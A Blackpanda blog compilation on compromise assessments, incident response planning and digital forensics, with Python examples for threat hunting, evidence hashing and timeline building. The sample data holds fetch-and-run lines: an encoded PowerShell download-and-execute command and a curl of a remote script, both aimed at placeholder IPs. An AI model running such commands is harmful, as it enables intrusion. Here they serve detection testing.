Would you know if you were breached? Cyber attackers often work undetected in a network for months or even years. They frequently enter through “legitimate” paths, setting off no alarms and leaving no trace of forced entry. Like a sniper, attackers lie in wait, gathering or exfiltrating confidential intel and building a profile of your business while looking for the perfect time to strike. Reducing the dwell time of an attack is the most crucial element to limiting the damage it can cause. 

Compromise assessments seek to find attackers who are currently in the environment or that have been active in the recent past, in a similar way to what an incident response firm would do in the event of a breach: it is an inside–out investigation and security audit of the organization’s internal environment, applications, infrastructures, and endpoints. 

Compromise assessments look at the system from the inside, searching for malware that has attempted to compromise, or has successfully compromised, the network, to provide insight into which vulnerabilities are being exploited. Results are based on suspicious user behaviors, extensive log review, Indicators of Compromise (IOCs), and any other evidence of past or present malicious activity, to identify attackers residing in the current environment.

Regular compromise assessments are also a regulatory requirement in many countries.

But how do compromise assessments work? Here is a rundown of the key steps that Blackpanda’s Level 3 Threat Hunting specialists carry out on client systems when conducting a compromise assessment. 

Step 1: Onboarding and network normalization

While Security Information and Event Management (SIEM), Endpoint Detection and Response (EDR) and other automated security solutions look for known malware and common malicious behaviors, new malware variants and attacks carried out through seemingly legitimate accounts often go undetected. At Blackpanda, our specialists perform a thorough investigation of the client’s systems to identify IOCs, attacker Tactics, Techniques, and Procedures (TTPs), and threats such as Advanced Persistent Threats (APTs) that are evading the existing security stack.

After assessing an organization’s security posture, we deploy SentinelOne’s next-generation Singularity platform to gather security logs and data for two weeks. This creates a baseline of behavior, gives us a detailed view of each endpoint’s network traffic and security events, and prepares the environment for advanced threat hunting queries.

Step 2: Active threat hunting

Our Level 3 Threat Hunting specialists conduct extensive log investigations using a proprietary list of more than 120 advanced threat hunting queries, updated weekly to reflect the most recent threat intelligence.

These highly customized queries are designed to uncover suspicious and malicious activities, including behavioral searches meant to identify highly sophisticated and previously unknown (zero-day) strains of malware.

Sample queries used by Blackpanda, labelled with the MITRE ATT&CK technique IDs they map to, include:

  • T1081: Suspicious access to credentials (ATT&CK ‘Credentials in Files’; this ID has since been retired in favour of T1552.001)
  • T1083: Detected directory enumeration (ATT&CK ‘File and Directory Discovery’)
  • T1497: A hook was placed in the mouse (ATT&CK ‘Virtualization/Sandbox Evasion’; a mouse hook is a user-activity check of the kind catalogued under T1497.002)
  • T1503: Sensitive data was decrypted (ATT&CK ‘Credentials from Web Browsers’; this ID has since been retired in favour of T1555.003)

Our bespoke Threat Hunting is designed to give a clear picture of the ongoing, potential and past breaches present in the system at the time the analysis is conducted.


Step 3: Threat reporting and containment

Once our threat hunters have meticulously looked through all computer logs, a report is produced detailing findings and delineating a path to action based on the state of the system.

Typical findings include attacks in their early stages, such as a password brute force attempt against an account before it has been breached. We also detect ongoing or past attacks through the identification of known malware and the presence of known-bad behaviors (network beaconing, IOCs, suspicious PowerShell scripting). Our Incident Response (IR) specialists can then proceed to contain a live incident and restore the organization’s security baseline.

Ultimately, the goal of the assessment is to rapidly identify critical vulnerabilities, adversary activity, or malicious logic. Once the assessment is complete, Blackpanda makes recommendations regarding the proper response and offers to preserve collected evidence for the organization to allow them to conduct a formal forensic investigation into the root cause and attribution of  the attack.
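The kind of logic behind steps 2 and 3 above, as an added example written for this page rather than Blackpanda’s proprietary query set or SentinelOne’s own rules: three hunting queries (a logon brute-force check, a beaconing check based on how regular outbound connection intervals are, and an encoded-PowerShell check that decodes the payload) run over a constructed, in-memory set of EDR-style events. The event field names, the thresholds and the sample records are all assumptions made for the example.

```python
import base64
import re
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

T0 = datetime(2024, 3, 1)  # base time for the constructed records below

def _ev(secs, **fields):
    return {"ts": T0 + timedelta(seconds=secs), **fields}

# Constructed sample telemetry (not real client data). Each dict is one normalised
# EDR/SIEM record; the field names are an assumption made for this example.
SAMPLE_EVENTS = [
    # 12 failed logons for svc_backup from one source, 15 s apart, then a success
    *[_ev(7200 + 15 * i, host="DC01", type="logon_fail", user="svc_backup", src_ip="10.0.5.23") for i in range(12)],
    _ev(7390, host="DC01", type="logon_ok", user="svc_backup", src_ip="10.0.5.23"),
    # a user mistyping a password twice: must not be flagged
    *[_ev(32400 + 20 * i, host="WS07", type="logon_fail", user="alice", src_ip="10.0.5.7") for i in range(2)],
    _ev(32440, host="WS07", type="logon_ok", user="alice", src_ip="10.0.5.7"),
    # beacon: WS07 -> 203.0.113.10:443 every 300 s with a second or two of jitter
    *[_ev(36000 + 300 * i + i % 3, host="WS07", type="net_conn", dst="203.0.113.10:443") for i in range(8)],
    # ordinary browsing to a CDN at irregular intervals: must not be flagged
    *[_ev(36000 + s, host="WS07", type="net_conn", dst="198.51.100.5:443") for s in (0, 40, 400, 420, 1500, 1510, 4000)],
    # encoded PowerShell spawned by Word (a classic macro-dropper pattern)
    _ev(36060, host="WS07", type="process", parent="WINWORD.EXE", image="powershell.exe",
        cmdline="powershell.exe -nop -w hidden -enc " + base64.b64encode(
            "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')".encode("utf-16-le")).decode()),
    # an administrator running a plain script: not an encoded command
    _ev(39600, host="WS07", type="process", parent="explorer.exe", image="powershell.exe",
        cmdline="powershell.exe -File C:\\ops\\inventory.ps1"),
]

def hunt_brute_force(events, threshold=10, window=timedelta(minutes=10)):
    """Flag (user, src_ip) pairs with >= threshold failed logons inside one window,
    and record whether a successful logon from the same source followed."""
    fails, successes = defaultdict(list), defaultdict(list)
    for e in events:
        if e["type"] == "logon_fail":
            fails[(e["user"], e["src_ip"])].append(e["ts"])
        elif e["type"] == "logon_ok":
            successes[(e["user"], e["src_ip"])].append(e["ts"])
    findings = []
    for key, times in fails.items():
        times.sort()
        start = 0
        for end in range(len(times)):  # sliding window over the sorted failures
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                later_ok = any(times[end] <= s <= times[end] + window for s in successes.get(key, []))
                findings.append({"user": key[0], "src_ip": key[1],
                                 "failures": end - start + 1, "succeeded_after": later_ok})
                break
    return findings

def hunt_beaconing(events, min_events=6, max_cv=0.1):
    """Flag (host, dst) pairs whose connections recur at near-constant intervals:
    a coefficient of variation of the gaps below max_cv is machine-like timing."""
    conns = defaultdict(list)
    for e in events:
        if e["type"] == "net_conn":
            conns[(e["host"], e["dst"])].append(e["ts"])
    findings = []
    for (host, dst), times in conns.items():
        if len(times) < min_events:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean > 0 and statistics.pstdev(gaps) / mean < max_cv:
            findings.append({"host": host, "dst": dst, "period_s": round(mean)})
    return findings

# Matches -e, -ec, -en, -enc, -EncodedCommand (PowerShell accepts any unambiguous prefix)
ENC_RE = re.compile(r"[-/]e(?:[cn][a-z]*)?\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)

def hunt_encoded_powershell(events):
    """Flag PowerShell started with an encoded command and decode the payload
    (base64 of UTF-16LE, which is what -EncodedCommand expects)."""
    findings = []
    for e in events:
        if e["type"] != "process" or "powershell" not in e["image"].lower():
            continue
        m = ENC_RE.search(e["cmdline"])
        if not m:
            continue
        try:
            decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            decoded = "<undecodable>"
        findings.append({"host": e["host"], "parent": e["parent"], "decoded": decoded})
    return findings

def run_hunt(events=SAMPLE_EVENTS):
    """Run every query; the result is the raw material for the step-3 report."""
    return {"brute_force": hunt_brute_force(events),
            "beaconing": hunt_beaconing(events),
            "encoded_powershell": hunt_encoded_powershell(events)}

if __name__ == "__main__":
    for name, hits in run_hunt().items():
        print(f"{name}: {len(hits)} finding(s)")
        for h in hits:
            print("   ", h)
```

The thresholds are deliberately conservative starting points: a coefficient of variation below 0.1 catches machine-like timing while the irregular CDN traffic stays unflagged, and a real hunt would tune both it and the brute-force window against the two-week baseline gathered in step 1, then carry the decoded command line and its parent process into the step-3 report.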

Step 4: Continued support

Unlike AI-led, automated threat hunting, our compromise assessment services are human-driven. Experts personally pore through logs to create a holistic picture of the network. This way, we can support an organization’s cyber defences beyond the Threat Hunting exercise, flagging activities that are damaging to the organization’s security. Along the way, we gain a deep understanding of an organization’s security posture and its specific needs, tailoring our ongoing services to fit its custom requirement set by its industry, regional landscape, and the latest trends in cyber attacks.

How often should your business conduct a compromise assessment?

Global financial institutions have internal teams, just like Blackpanda’s, conducting compromise assessments on a daily basis, as their risk tolerance for being unaware of an active breach is essentially nil. For smaller companies, which can accept a higher risk tolerance, compromise assessments can be conducted weekly, monthly, or even quarterly; the decision on frequency is ultimately a cost-benefit analysis for each business.

Blackpanda recommends a minimum of quarterly compromise assessments in Asia because the average regional dwell time, the time between an intrusion and the victim detecting it, is around 90 days. Conducting compromise assessments quarterly lets an organization find an active breach deliberately rather than stumbling on it by accident after a typical dwell period, and so reduces the damage the attacker can inflict.

Third-party compromise assessments are the gold standard, as they are objective and impartial, while limiting the possibility of insider threat during the course of the operation. 

Blackpanda’s experts are able to dig deeper than day-to-day real-time monitoring normally allows. The assessment also brings tools and techniques, such as digital forensic analysis and behavior analytics, that are typically reserved for incident response, and investigators are better suited to detecting post-compromise activity. Compromise assessments are an extremely effective defense-in-depth measure for uncovering any threats that have made it past an organization’s defenses.

--

An independent compromise assessment can uncover compromises that may have gone undetected, thereby providing the evidence needed to justify additional security investments.

Many organizations do not have adequate investment levels for cyber security or do not have the time or resources to implement all the necessary cyber controls. A regular compromise assessment should thus be incorporated into your risk mitigation strategy to ensure your environment is not compromised by attacks that are more sophisticated than what your organization can detect with your current means. 

Compromise assessments not only reduce attack dwell time by disrupting and eradicating hidden attackers before they can act, but also root out attackers who steal or abuse legitimate access credentials and show due diligence by assuring investors, regulators, and other stakeholders of your security.

Whether you suspect a breach or are looking for peace of mind, Blackpanda threat hunting specialists assist with the detection and identification of attackers already in your network, uncovering hidden threats and prioritizing a plan of action you can follow for remediation. Would you know if you were breached? To get ahead of an attack, contact Blackpanda to conduct a compromise assessment on your network.

React & Respond

How to create an incident response plan

Six steps for effective Incident Response planning.

Cyberattacks have significantly increased over the years and are now more complex than ever. In order to safeguard your business from vulnerabilities, it is important to ensure that you have a cyber incident response plan in place that can be activated in times of crisis—especially when your reputation, revenue, and customer relationships are on the line.

Much like fire drills, incident response is a business process that should be actively and regularly practiced such that it becomes second nature even during high-pressure situations.

An incident response plan must be put in place to guide mitigation and recovery. The plan should follow the processes prescribed by the SANS Institute and NIST for a methodical, organized approach.

However, not all cyber security incidents are similar in nature and importance. While some require rigorous investigation because of the complexity of the attack and the size of the damage, others may simply be login failures or isolated cases.

Your company should therefore keep a list of possible event and incident types, with specifics on when each type needs a thorough investigation, and adapt its incident response processes accordingly.

How do you make a cyber incident response plan?

Before elaborating on each step of the incident response process, review the phases defined by the SANS Institute and NIST that must be considered when conducting incident response:

SANS Institute:

  1. Preparation
  2. Identification
  3. Containment
  4. Eradication
  5. Recovery
  6. Lessons Learned

NIST:

  1. Preparation
  2. Detection and Analysis
  3. Containment, Eradication, and Recovery
  4. Post-Incident Activity

Both the SANS Institute and NIST phases clearly share the same elements in the same order; the only difference is that NIST groups some of them into a single step. Both frameworks provide guidance on the key considerations for building an effective incident response plan, which we outline below.

Preparation

'Preparation' not only better arms the IR efforts in case of a future incident but it will also greatly reduce the risk that a response will be required in the first place.

This stage is critical, and much effort should be put to ensure the organization is as prepared as possible.

Some (non-exhaustive) questions to consider:

  • What elements comprise your security infrastructure?
  • Who is in your response team?
  • Who are the decision-makers?
  • Do you need experts in Media, Legal, HR, or IT Systems?
  • Do you have reporting obligations to external authorities? If so, who will liaise with them and when?
  • Do you have adequate internal skills or do you need trusted partners to assist?
  • Are you capable of capturing evidence for use in potential criminal or civil proceedings?

Prioritize your assets. List not only your critical assets but also your systems, networks, servers, and applications. Assess their value and rank them by importance. Then observe the traffic patterns for these assets, establish the norm, and watch for discrepancies.

Set up appropriate policies and standards to follow in different situations such as network access, login guidelines, use of strong passwords, file sharing, as well as email and other platform access.

Strategize on how to manage the different types of cases and incidents. Rank each possible event based on priority, severity, and organizational impact. Provide notes on each event, specifying how it can be resolved, what steps to take to remediate it, and what tools to use, if any.

Set up a communication plan among all stakeholders involved. Assign responsibilities among individual contact persons, what form of communication to use, when they should be contacted and during which kinds of incidents. Do not forget to include and collaborate with the Legal, HR, and Procurement teams (including external partners) to move forward with requests much more quickly and efficiently.

Properly document all events and provide updates. Include information about checklists, questions to be answered in case of emergencies, instructions, and other important information. Conduct regular cyber hygiene checks and updates.

Provide access control, tools, and training. You must give specific access to the company’s network and systems to your incident response team in order for them to conduct all necessary actions to mitigate the crisis. Likewise, proper cyber incident response tools and training must be available to them to ensure that they are well-equipped to fix issues that will be discovered during the incident.


Identification (or detection and analysis)

An organization's network will host literally millions of events, including system log-ons, software updates, and network connections being established. Over 99.9% of these events are normal behavior for your environment.

The trick is to identify the event or events that are unauthorized or have an adverse impact on your systems and business. These are called 'incidents', and incidents must be investigated.

To catch incidents early, three basic steps are essential. Firstly, regular and strict monitoring must be in place; this helps detect and report anomalies and potential security risks. Monitoring security events includes constant review of log files, error messages, intrusion detection systems, and firewalls.

At the onset of an attack, identifying the root cause of the breach is the main objective. Gather all necessary details about the incident. Find out who, what, when, where, and how it happened. Check from different entry points and indicators including user accounts, system administrators, network administrators, the SIEM, and logs.

Alert and report the incident to the proper authority by submitting an incident ticket. Classify the incident based on the provided incident types. Analyze and record the extent of the event, especially its damage to the systems—if any.

Containment

While this is the step in the incident response handling process where SANS Institute and NIST differ the most, the essential focus in both is to contain damage, eradicate all threats and restore systems back online.

Part of containing the damage is ensuring that the incident does not escalate further. This includes isolating the affected accounts, servers, or network segments from the rest of the environment; backing up files and systems; and temporarily repairing any damaged material. It is also important to keep all evidence safe from destruction.

Note that managing containment can be tricky as many stakeholders may be affected and certain efforts may even tip off the attackers that you are aware of their efforts. As such, decision-makers need to be informed and empowered to make critical choices at this stage. Consideration must be given to balancing the risk of continuing normal operations with the actions required to mitigate the threat.

Eradication

Following Identification and Containment, there should be enough information to determine the root cause of the incident and how to best disrupt the attacker and remove them from your environment. The priority is to neutralize and remove all threats, including malicious activities and contents. Consider conducting a complete reimaging of the system’s hard drive to safeguard from subsequent attacks.

Recovery

Any affected systems or platforms will need to be restored to proper working order following an incident. Examine any connected or related systems to ensure they are operating as normal with no signs of compromise.

Security professionals must coordinate these efforts with the business and operations teams to minimize disruption and maximize efficiency. Lastly, recovery requires establishing more sophisticated monitoring and detection techniques for combating future threats.

Cyber Incident Response Lessons Learned (or Post-Incident Activity)

The final step in the incident handling process is an assessment of the entire incident: how it was prepared for, managed, and addressed. At Blackpanda, we support our clients at this stage through our cyber incident response reports. While many firms regrettably skip this process, it is essential to recognize your successes and failures throughout, as this provides a cyber incident response case study that is directly applicable to your business and informs your future incident response planning.

Systematic reflection highlights areas for future improvement, along with practices that should be kept up. This final step serves as training that you can use to update your current incident response plan and the list of incidents you have already encountered.

What did the organization and stakeholders learn from this incident? Could the incident have been prevented? Was it handled correctly? Do we have the right people and resources to detect and manage such incidents in the future?

Prepare briefings for the board, shareholders, and reporting agencies where required, and always remember: security is ultimately a human problem – can we better train our employees in any way?

Putting It All Together​

Cyber attacks have become a certainty in the lifetime of a business, and preparation is the only way that organizations can build adequate resilience to the evolving cyber threats.

An effective incident response plan is one that is grounded in the NIST and SANS frameworks. Key steps of pre-breach and post-breach cyber security include preparation, identification, containment, eradication and recovery, as well as post-breach learning.

As Asia’s premier Digital Forensics and Incident Response provider, Blackpanda supports your organization in building an incident response plan that is tailored to your specific business and industry, with a sharp focus on tackling threats in the Asian landscape.
Contact us to learn more about our incident response planning services or to report a breach.

React & Respond

Everything you need to know about incident response

Learn more about the ins and outs of incident response

What is Incident Response?

Incident Response (IR) is the systematic approach to managing a cyber security incident. Like firefighters at a burning building, we help identify the source of danger and the scope of damage, and strategise an approach to contain and eradicate the threat.

Often, an incident response strategy also includes aspects of crisis management, digital forensic investigation, and legal or public relations support (as needed). The ultimate goal of incident response is to limit damage and identify the root cause of the incident to better manage future risks. Effective incident response allows you to remediate a situation faster, protecting sensitive data, your company’s reputation, and revenue streams.

What is Digital Forensics?

Digital forensics is the process of uncovering and interpreting electronic data from digital devices. Data collected from these devices help identify and preserve evidentiary materials in an organisation’s digital infrastructure, and can be very important in an investigation relating to a cyber attack.

Digital forensics practices include:

  • File System Forensics—whereby file systems within the endpoint are analyzed for signs of compromise
  • Memory Forensics—whereby the computer memory is analyzed for attack indicators that may not appear within the file system
  • Network Forensics—whereby network activity—including emailing, messaging and web browsing—is reviewed to identify an attack, understand the cyber criminal’s attack techniques and gauge the scope of the incident
  • Log Analysis—whereby activity records or logs are reviewed and interpreted to identify suspicious activity or anomalous events

On top of this, analysis from the digital forensics team can help shape and strengthen preventative security measures, such as with compromise assessments. This can enable the organisation to reduce overall risk, as well as speed future response times. Digital forensics enables Blackpanda specialists to piece through the aftermath of an attack in order to better understand how the breach happened in the first place.

Ransomware Incident Response

Ransomware attacks have been on the rise, with the Asia Pacific region alone experiencing a 168% increase in ransomware incidents in 2021 compared to the previous year. Not only are ransomware attacks becoming more common, but they are targeting organisations across all sectors and sizes, from large multinationals to Small-Medium Enterprises (SMEs) and startups. In this article, we look at how your company can protect itself from ransomware and what to do in the event that you experience an attack.

Falling victim to ransomware can be a stressful and emotional time, and an experienced IR company such as Blackpanda provides invaluable help in containing the attack, eradicating the malware, and restoring business as usual, all whilst managing PR, negotiating with the attackers, and ensuring safety and legality throughout. 

Incident Response Regulations

On January 18th, 2021, the Monetary Authority of Singapore (MAS) released its latest revision to The Notice on Technology Risk Management (TRM). Key to this update are the requirements to investigate and report certain cyber incidents to the MAS.

The TRM applies to financial institutions (FIs) in Singapore. FIs include (but are not limited to) all banks, licensed financial advisers, licensed insurers, registered insurance brokers, and recognized market operators incorporated in Singapore. 

With Incident Response and Reporting now mandatory for compliance with MAS guidelines, Blackpanda produced an advisory covering reporting requirements and the capabilities needed to support an investigation.

How to Create an Incident Response Plan? 

Much like fire drills, incident response is a business process that should be actively and regularly practised such that it becomes second nature even during high-pressure situations.

An incident response plan must be put in place to guide in mitigating attacks and recovery. This plan must follow the SANS Institute and NIST prescribed processes for a methodical and more organised approach. However, it must be noted that not all cybersecurity incidents are similar in nature and importance. While some may require rigid investigations due to the complexity of the attack and the size of the damage, others might simply be login failures or isolated cases.

Your company should therefore maintain a catalogue of likely event and incident types, with criteria specifying when each warrants a full investigation, and scale your incident response processes to match. Follow this guide to understand the key steps to building an effective incident response plan.

How Do You Build an Effective Incident Response Team?

Handling cyber security incidents can be stressful, especially with uncertainty regarding cause, remediation, and the extent of the impact. However, firms are often required to respond to an attack immediately with whatever information is available, or they run the risk of greater loss. This stress intensifies when firms do not know what to do or whom to call, leaving them seemingly helpless and more susceptible to loss.

To better prepare for cyber emergencies, firms should invest in a team of incident responders who are equipped with technical skills to act quickly and reliably. The incident response team is responsible for mitigating the effects of an incident in a timely and organized manner, including analyzing the intrusion, containing the impact, investigating the root cause, and remediating the issue.

Is Incident Response a Good Career Option?

Cyber security companies report that skilled talent is hard to find, and offer good pay and learning opportunities to those who have the relevant competencies and predisposition to grow into these roles.

Working in cyber security exposes you to a fast-paced and rapidly developing environment. Because the threat landscape is constantly evolving, staying up to date on the latest threats and malicious actors is crucial to success, and new roles emerge as cyber threats and cyber regulations develop. In Asia, a Cyber Security Analyst can expect a salary between USD 22,000 and USD 77,000 a year.

– –

Blackpanda is Asia's premier Digital Forensics and Incident Response (DFIR) firm.

To schedule an exploratory call with one of our experts, or if you are experiencing a breach, contact us here.

React & Respond

Steps to digital forensics simplified

When cyber crime occurs in your digital environment, employing digital forensics to identify the extent of the compromise and investigating the root cause should be your top priority.

With the rising number of cybercrimes, tracking nefarious actors online has become a crucial focal point for both governments and private enterprises alike. When cybercrime takes place within your own digital environment, identifying the extent of the compromise and investigating the root cause should be your top priority in order to contain the damage, eradicate the threat, and mitigate further loss.

Digital forensics is the process of uncovering and interpreting electronic data from digital devices. It is often in relation to cybercrime and assists in pinpointing the origin of an attack, tracing it back to the source and enabling the recovery of lost or stolen data. Typically, an investigation involving digital forensics would include the following five critical steps:

1. Identification

Knowing where to look for electronic evidence is extremely important when beginning an investigation. Sources of relevant evidence may include (but are not limited to) mobile phones, computers, servers, emails, and internet service providers. The process of identification may not only be digital; observation of physical surroundings (e.g., security camera positions, key card access control readers, etc.) may also provide physical evidence in putting together a timeline.

2. Containment

Containment is the first active response to a crisis: it stops the attacker from carrying out further malicious activity and prevents additional damage. The nature of the incident determines the containment measures taken, which range from controlling and monitoring the affected assets to enabling additional security controls.

Upon identification, system or network isolation might be necessary in order to reduce damage and prevent further disruption to business operations. To decide whether or not a system requires isolation, consider critical factors such as the extent to which the system, platform, or application is deployed within the company network. Where possible, isolate at the network level rather than powering the machine off: shutting down discards volatile memory, which the memory forensics stage of the investigation depends on.

3. Collection & Preservation

Data collection should be done without damaging the original systems, meticulously following established procedures and ensuring data integrity. Different data acquisition methods and tools may be used for different systems. Analysis should be conducted on the acquired copy or duplicate image rather than on the original system, so that the original remains unaltered and the copy can later be corroborated against it.

Preserving data correctly is key to ensuring that all information available is authentic and valid. Fundamental documentation of the evidence collected should include the date and time of collection (When), a description of the evidence itself (What), details of the source system such as its operating system, hardware or software specifications and network identifier (Where), and the acquisition tools used (How). A cryptographic hash of each acquired image, computed at collection and re-checked before analysis, is the standard way to demonstrate that the copy has not been altered since it was taken. There should also be established standards for properly storing the data collected and preventing any evidence tampering.

Much like a physical crime scene, photos (or, in this case, digital copies) are taken of the evidence at the scene of the incident. Visuals of the scene are used as a point of reference for investigation. As incident responders often work in teams, these visuals enable parallel analysis among the multiple specialists. Digital copies are also highly useful for documenting the Incident Report following the investigation.
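The collection and preservation step above, as an added example (this is illustrative code, not Blackpanda's tooling): each acquired item gets a manifest entry recording the When, What, Where and How, together with a SHA-256 digest, and the digest is re-checked later so that any alteration of the copy is detected. The hostname, IP address, tool name and the sample "memory image" are all constructed for the example.

```python
"""Evidence acquisition manifest with integrity verification (added example)."""
import hashlib
import json
import os
import tempfile
from datetime import datetime, timezone


def sha256_file(path, chunk_size=1 << 20):
    """Stream the file through SHA-256 so multi-gigabyte images fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def record_evidence(path, description, source_system, tool, collector):
    """Build one manifest entry: When, What, Where, How, plus the digest."""
    return {
        "collected_at_utc": datetime.now(timezone.utc).isoformat(),  # When
        "description": description,                                  # What
        "source_system": source_system,                              # Where
        "acquisition_tool": tool,                                    # How
        "collector": collector,
        "path": os.path.abspath(path),
        "size_bytes": os.path.getsize(path),
        "sha256": sha256_file(path),
    }


def verify_evidence(entry):
    """Re-hash the stored copy; False means it no longer matches the record."""
    return os.path.exists(entry["path"]) and sha256_file(entry["path"]) == entry["sha256"]


def write_manifest(entries, manifest_path):
    """Persist the manifest next to the evidence; sorted keys keep diffs stable."""
    with open(manifest_path, "w", encoding="utf-8") as fh:
        json.dump(entries, fh, indent=2, sort_keys=True)


def demo():
    """Constructed walkthrough: acquire an 'image', verify it, then detect tampering."""
    workdir = tempfile.mkdtemp(prefix="evidence-")
    image = os.path.join(workdir, "ws-042-memory.raw")
    with open(image, "wb") as fh:
        fh.write(b"\x00" * 4096 + b"constructed sample image")  # constructed content

    entry = record_evidence(
        image,
        description="Full memory capture of workstation WS-042 (constructed)",
        source_system={"hostname": "ws-042.example.test",  # assumed values
                       "os": "Windows 10 22H2", "ipv4": "10.20.30.42"},
        tool="winpmem (assumed tool name for the example)",
        collector="analyst-1",
    )
    intact = verify_evidence(entry)

    with open(image, "ab") as fh:  # simulate post-collection tampering
        fh.write(b"x")
    tampered = not verify_evidence(entry)

    write_manifest([entry], os.path.join(workdir, "manifest.json"))
    return intact, tampered


if __name__ == "__main__":
    print(demo())  # expected: (True, True)
```

The manifest itself should be stored separately from the evidence copy (and ideally signed or hashed in turn), otherwise whoever can alter the image can also rewrite the recorded digest.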

4. Analysis & Eradication

The primary goal of analysis is to determine how and when the breach happened by scrutinizing and interpreting the evidence collected. The analytical process draws on a multidisciplinary approach, pulling resources from various skillsets, expertise, and training. Approved tools and methodologies must be adhered to during this process.

Time and date parameters or boundaries are often the first two key factors identified as they are important in building the timeline of events that uncover how an attacker may have entered a system, moved within it, and taken actions on objectives. Time and date parameters also help investigators narrow the scope of an investigation, eliminate externalities and hypotheticals, and focus on the time range of the attack to more efficiently obtain useful findings.

Matching evidence to an event timeline may help identify corroborative evidence of the incident. Depending on the goals and priorities of the investigation, forensic investigators may interpret and draw conclusions based on facts gathered from the evidence.
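The timeline-building step described above, as an added example (not Blackpanda's own tooling): three constructed log formats with different timestamp conventions are parsed, every timestamp is normalised to UTC, and the merged events are then bounded to a time window around a known-bad event and ordered. The syslog lines carry neither a year nor a zone, so both are assumptions and are recorded on the event; hostnames, users and addresses are invented.

```python
"""Unified event timeline from heterogeneous log sources (added example)."""
import re
from datetime import datetime, timedelta, timezone

# --- constructed sample input ------------------------------------------------
# 1) Linux auth log (syslog style): no year, no zone; assumed UTC and 2022.
AUTH_LOG = """\
Mar  3 02:14:07 web-01 sshd[4121]: Accepted password for deploy from 203.0.113.7 port 51234 ssh2
Mar  3 02:15:30 web-01 sudo: deploy : TTY=pts/0 ; COMMAND=/usr/bin/curl http://198.51.100.9/a.sh
"""
# 2) Windows security export: local time with an explicit offset (JST, +09:00).
WIN_LOG = """\
2022-03-03T10:52:11+09:00 FILE-SRV 4624 user=svc_backup src=10.20.30.42
2022-03-03T11:05:48+09:00 FILE-SRV 4688 user=svc_backup cmd=powershell.exe -enc ...
"""
# 3) Proxy access log (Apache style) recorded in a -05:00 zone.
PROXY_LOG = """\
10.20.30.42 - - [02/Mar/2022:21:15:31 -0500] "GET http://198.51.100.9/a.sh HTTP/1.1" 200 1432
10.20.30.42 - - [01/Mar/2022:08:00:00 -0500] "GET http://intranet.example.test/ HTTP/1.1" 200 512
"""

SYSLOG_RE = re.compile(r"^(\w{3})\s+(\d{1,2}) (\d\d:\d\d:\d\d) (\S+) (.*)$")
WIN_RE = re.compile(r"^(\S+) (\S+) (\d+) (.*)$")
PROXY_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) \d+$')


def parse_auth(lines, assumed_year=2022):
    """Syslog has no year or zone; record the assumption on each event."""
    for line in lines.splitlines():
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        mon, day, clock, host, msg = m.groups()
        ts = datetime.strptime(f"{assumed_year} {mon} {day} {clock}", "%Y %b %d %H:%M:%S")
        yield {"ts": ts.replace(tzinfo=timezone.utc), "source": "auth.log",
               "host": host, "event": msg, "note": "year and zone assumed"}


def parse_windows(lines):
    """ISO-8601 with offset: convert to UTC so JST and UTC events interleave correctly."""
    for line in lines.splitlines():
        m = WIN_RE.match(line)
        if not m:
            continue
        ts, host, event_id, rest = m.groups()
        yield {"ts": datetime.fromisoformat(ts).astimezone(timezone.utc),
               "source": "windows-security", "host": host,
               "event": f"EID {event_id} {rest}"}


def parse_proxy(lines):
    """Apache-style bracketed timestamp with numeric offset."""
    for line in lines.splitlines():
        m = PROXY_RE.match(line)
        if not m:
            continue
        client, ts, request, status = m.groups()
        parsed = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        yield {"ts": parsed.astimezone(timezone.utc), "source": "proxy",
               "host": client, "event": f"{request} -> {status}"}


def build_timeline(start_utc, end_utc):
    """Merge all sources, keep only the investigation window, order by time."""
    events = (list(parse_auth(AUTH_LOG)) + list(parse_windows(WIN_LOG))
              + list(parse_proxy(PROXY_LOG)))
    window = [e for e in events if start_utc <= e["ts"] <= end_utc]
    return sorted(window, key=lambda e: e["ts"])


def pivot_window(anchor_utc, before=timedelta(hours=6), after=timedelta(hours=6)):
    """Bound the search around a known-bad event, as the text suggests."""
    return build_timeline(anchor_utc - before, anchor_utc + after)


def demo():
    """Pivot on the first suspicious SSH login; the Mar 1 proxy line falls outside."""
    anchor = datetime(2022, 3, 3, 2, 14, 7, tzinfo=timezone.utc)
    return pivot_window(anchor)


if __name__ == "__main__":
    for e in demo():
        print(e["ts"].isoformat(), e["source"], e["host"], e["event"])
```

Once normalised, the sequence reads naturally: the service-account logon and PowerShell execution on the file server precede the SSH login on the web host, which is followed by the download of the same script seen in the proxy log. Without the zone conversion the JST events would have sorted nine hours later and the story would have been wrong.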

As part of the threat eradication process, activities such as blocking malicious network indicators, rebuilding compromised systems and resetting account credentials should each be followed by verification steps to ensure that remediation is comprehensive. A thorough exposure check or a vulnerability assessment of the entire environment, together with continuous monitoring, is advised to identify other weak links and residual threats. To prevent recurrence, a new set of defenses may be proposed.

One important action that complements the steps above is copious note-taking. Documentation should be detailed enough such that actions taken can be replicated and reproduced by another person.

5. Reporting

The last step in this process is reporting. The report should identify the source of the breach, the techniques and methodology used to investigate and mitigate the attack, the evidence collected, and advisory materials for stakeholders and decision makers. The report should be factual, impartial, and non-technical so that stakeholders can easily understand it and take the necessary action.

-- 

While each company or system is unique and requires its own incident response plan, the above-mentioned serves as a general overview of the investigation process involving digital forensics. For professional advice on incident response planning suited to your firm’s specific needs, schedule a call with one of Blackpanda’s cyber incident responders to plan your response.

News

Cyber attacks shake Japanese automotive supply chain

Blackpanda incident response and digital forensics analysts continue to monitor a series of critical attacks against Japan's automotive industry.

Blackpanda incident response and digital forensics analysts continue to monitor a series of critical attacks against Japan's automotive industry. The Toyota Group ecosystem not only represents a core pillar of the global economy, but comprises nearly 60,000 companies across tier one through four partners. In early March 2022, the international group Denso, one of Toyota’s tier-1 providers, confirmed a ransomware attack against its core operations in Germany. 

